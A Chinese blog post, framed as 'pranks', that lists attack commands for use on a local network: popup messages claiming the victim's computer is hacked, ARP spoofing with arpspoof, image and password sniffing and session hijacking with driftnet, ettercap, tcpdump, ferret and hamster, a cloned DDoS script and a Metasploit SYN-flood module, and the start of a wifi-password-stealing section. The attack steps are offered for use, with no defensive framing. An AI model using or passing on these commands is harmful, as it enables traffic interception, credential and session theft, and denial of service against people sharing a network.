恶作剧 一时失言乱红尘 2022-12-11 03:18 126阅读 0赞 # 一,windows环境命令进行 # 一,发送信息类 1.利用msg进行发送消息 msg /server:192.168.123.141 * "你的电脑已经被入侵" #语法 msg server:(ip) * "消息内容" 注意事项 ①获取会话名称时的错误1722 原因:RPC(一种调用模型)服务器不可用 解决方法: win+r运行regedit.exe,找到"计算机\\HKEY\_LOCAL\_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server"把AllowRemoteRPC的值从0改为1就能接受信息了。 ②获取会话名称时的错误5 造成原因:–>无用户凭据导致 解决方法:–>以管理员身份运行即可 ③msg不是内部或外部命令 造成原因:–>无环境变量导致 解决方法:–>添加环境变量即可解决 2.老版本 利用net send 发送信息类 net send ip 信息 #如net send 192.168.123.94 sb # 二.工具进行 # ## arp攻击 ## 1.检查以及获取网段 即查看局域网存活主机 fping -asg 192.168.1.1/24 或者-->nmap -sP ip 扫描常用的端口-->nmap -F -sT -v nmap.org 注意点: ①攻击者的IP和被攻击者的IP需要在同一个网段中(即需要两个ip段可以连接ping通) ②默认的网卡必须是eth0 –>如 ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center] 2.攻击方法 echo 1 >/proc/sys/net/ipv4/ip_forward #即开启端口转发功能 arpspoof -i eth0 -t 192.168.1.1 192.168.1.104 #即 前面的IP是靶机的IP,后面的IP是攻击者的ip 即将该ip欺骗到其他上面的状况特点-->断网攻击 #arpspoof -i 网卡 -t 网关 目标IP driftnet -i eth0 #窃取受害者的图片 ettercap -Tq -i eth0 #ettercap -i 网卡 -Tq -M #进行账号密码嗅探-->即抓取账号密码状况特点 tcpdump -i eth0 -w qq.cap ferret -t qq.cap (64位下需要安装) hamster http://hamster #session劫持 即arpspoo攻击成功后进行嗅探密码的状况特点 ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 1] ## DOS/DDOS攻击 ## ## 方法1 ## ①安装ddos攻击模块 git clone https://github.com/Ha3MrX/DDos-Attack ②进入DDos-Attack且运行文件 cd DDos-Attack ls python ddos-attack.py ![在这里插入图片描述][20200927090413666.png_pic_center] ③输入目标的ip以及端口即可以进行攻击 ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 2] ## 方法2 ## 利用Metasploit模块进行实现 #进入msf模块中 msfconsole #进入潮汐攻击目录 use auxiliary/dos/tcp/synflood set rhost 目标服务器 #执行 exploit 如 把自己的服务器拿来做测试做的一个小的攻击 ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 3] ## 窃取wifi密码 ## #扫描局域网范围中的wifi airodump-ngwlan0mon # [案例][Link 1] [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center]: /images/20221123/12e0c21c0b3e44c48406aff16c400454.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 1]: /images/20221123/4f174101af704212bd1cbec5fef9250d.png [20200927090413666.png_pic_center]: /images/20221123/06400999924e4d95977d338cb92db454.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 2]: /images/20221123/e2ba0e50d4454236b2dd46b28e4e2a91.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 3]: /images/20221123/1e36193df178474e9842af9a072399a9.png [Link 1]: https://bbs.ichunqiu.com/thread-56202-1-3.html
相关 Java初学者:无限循环的恶作剧 在Java编程中,无限循环可能看起来像一个恶作剧,但其实它是一种特殊的控制结构,如果没有妥善处理,确实会带来问题。 例如: ```java while (true) { 女爷i/ 2024年11月15日 19:36/ 0 赞/ 4 阅读
相关 【tkinter】蓝屏程序恶作剧 python-tkinter:实现很难退出的假蓝屏 简介 源码 效果 原理 关闭 简介 使用`tkinter`库写一个蓝屏的界面来实 缺乏、安全感/ 2024年02月19日 20:20/ 0 赞/ 50 阅读
相关 恶作剧 一,windows环境命令进行 一,发送信息类 1.利用msg进行发送消息 msg /server:192.168.123.141 "你的电脑已经被入侵" 一时失言乱红尘/ 2022年12月11日 03:18/ 0 赞/ 127 阅读
相关 揭穿恶作剧重建TCP连接和进程之间的关联 是时候将把戏揭穿了。 请先阅读下文: [https://blog.csdn.net/dog250/article/details/108113329][https_blo 小咪咪/ 2022年11月29日 12:30/ 0 赞/ 119 阅读
相关 制造恶作剧切断TCP连接和进程之间的关联 想不想再玩个恶作剧?? 很多运维发现系统中有tcp连接异常的时候,会使用netstat/ss命令找出tcp连接对应的处理进程,然后去找研发debug这个进程。比如: 浅浅的花香味﹌/ 2022年11月29日 11:29/ 0 赞/ 115 阅读
相关 C/C++ 趋向于运算符的恶作剧 前阵看到一个帖子,说c语言有一个鲜为人知的运算符叫做“趋向于”,写作"-->",还给出了源码: include <stdio.h> int main(int た 入场券/ 2022年08月06日 11:25/ 0 赞/ 140 阅读
相关 愚人节看恶作剧的十大去处 庆祝愚人节已经成为许多网络公司的传统.让每年的愚人节节目都保持创造性是一件很难的事情,但一些公司已经知道该如何做到这一点. 根据它们过去的表现,以下将列出观看愚人 左手的ㄟ右手/ 2022年01月11日 02:29/ 0 赞/ 175 阅读
相关 询问HTG:增强Wi-Fi连接性,校准显示器并执行基于计算机的恶作剧 ![Ask-How-To-Geek-Template][] Once a week we share reader problems and three solutions; 本是古典 何须时尚/ 2021年07月26日 23:59/ 0 赞/ 324 阅读
还没有评论,来说两句吧...